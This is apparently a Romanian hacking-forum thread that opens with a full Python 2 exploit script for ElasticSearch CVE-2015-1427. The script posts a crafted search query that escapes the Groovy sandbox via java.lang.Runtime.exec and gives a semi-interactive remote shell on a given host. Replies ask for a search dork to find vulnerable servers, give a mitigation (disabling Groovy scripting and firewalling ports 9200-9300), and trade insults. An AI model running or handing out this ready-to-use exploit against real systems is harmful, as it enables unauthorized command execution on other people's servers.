ElasticSearch Unauthenticated Remote Code Execution

[Aerosol]

#!/bin/python2
# coding: utf-8
# Author: Darren Martyn, Xiphos Research Ltd.
# Version: 20150309.1
# Licence: WTFPL - wtfpl.net
import json
import requests
import sys
import readline
readline.parse_and_bind('tab: complete')
readline.parse_and_bind('set editing-mode vi')
__version__ = "20150309.1"

def banner():
    print """\x1b[1;32m
??????  ???    ???        ?????? ????????? ??? ??????    ??????  ??? ?? ??????  ???     ???   
??   ? ????   ??????    ???    ? ?  ??? ?????????? ??  ???    ? ???? ?????   ? ????    ????   
????   ????   ???  ???  ? ????   ? ???? ?????????    ? ? ????   ????????????   ????    ????   
???  ? ????   ?????????   ?   ???? ???? ? ???????? ????  ?   ?????? ??? ???  ? ????    ????   
?????????????????   ?????????????  ???? ? ????? ????? ?????????????????????????????????????????
?? ?? ?? ???  ???   ????? ??? ? ?  ? ??   ??  ? ?? ?  ?? ??? ? ? ? ??????? ?? ?? ???  ?? ???  ?
 ? ?  ?? ? ?  ? ?   ?? ?? ??  ? ?    ?     ? ?  ?  ?   ? ??  ? ? ? ??? ? ? ?  ?? ? ?  ?? ? ?  ?
   ?     ? ?    ?   ?   ?  ?  ?    ?       ? ??        ?  ?  ?   ?  ?? ?   ?     ? ?     ? ?  
   ?  ?    ?  ?     ?  ?      ?            ?  ? ?            ?   ?  ?  ?   ?  ?    ?  ?    ?  ?
                                              ?                                               
 Exploit for ElasticSearch , CVE-2015-1427   Version: %s\x1b[0m""" %(__version__)

def execute_command(target, command):
    payload = """{"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"}}}""" %(command)
    try:
        url = "http://%s:9200/_search?pretty" %(target)
        r = requests.post(url=url, data=payload)
    except Exception, e:
        sys.exit("Exception Hit"+str(e))
    values = json.loads(r.text)
    fuckingjson = values['hits']['hits'][0]['fields']['lupin'][0]
    print fuckingjson.strip()


def exploit(target):
    print "{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something"
    while True:
        cmd = raw_input("~$ ")
        if cmd == "exit":
            sys.exit("{!} Shell exiting!")
        else:
            execute_command(target=target, command=cmd)

def main(args):
    banner()
    if len(args) != 2:
        sys.exit("Use: %s target" %(args[0]))
    exploit(target=args[1])

if __name__ == "__main__":
    main(args=sys.argv)

Source

[florinul]

Un google dork poate furniza careva ?

[aelius]

Rezolvare (debian way):

echo  "script.groovy.sandbox.enabled = false" >> /etc/elasticsearch/elasticsearch.yml
/etc/init.d/elasticsearch restart

Daca vreti mai profi, restrictionati pe IP. Exemplu:

iptables -A INPUT -p tcp --dport 9200:9300 -s your_fucking_ip_address -j ACCEPT
iptables -A INPUT -p tcp --dport 9200:9300 -j DROP

Un google dork poate furniza careva ?

Cred ca nu stii ce e elasticsearch.

[SirGod]

Rezolvare (debian way):

echo  "script.groovy.sandbox.enabled = false" >> /etc/elasticsearch/elasticsearch.yml
/etc/init.d/elasticsearch restart

Daca vreti mai profi, restrictionati pe IP. Exemplu:

iptables -A INPUT -p tcp --dport 9200:9300 -s your_fucking_ip_address -j ACCEPT
iptables -A INPUT -p tcp --dport 9200:9300 -j DROP

Cred ca nu stii ce e elasticsearch.

Dac? ar ?ti Aerosol tot ce posteaz?, ne-ar pune în cur pe to?i.

[Aerosol]

@SirGod era vorba de florinul nu de mine.

Aerosol nu stie nici engleza nivel mediu,sa nu vorbim de cunostinte in domeniul IT.

Daca ai stii limba romana cum stiu eu engleza ar fi ceva...

Cat despre IT mai ai de mancat pentru ati permite sa pronunti macar acest cuvant,

te rog frumos inceteaza cu offtopic-ul la posturile mele ( daca ai sa-mi spui ceva ai PM )

Edited March 13, 2015 by Aerosol

[Faciubici]

Dac? ar ?ti Aerosol tot ce posteaz?, ne-ar pune în cur pe to?i.

Aerosol nu stie nici engleza nivel mediu,sa nu vorbim de cunostinte in domeniul IT.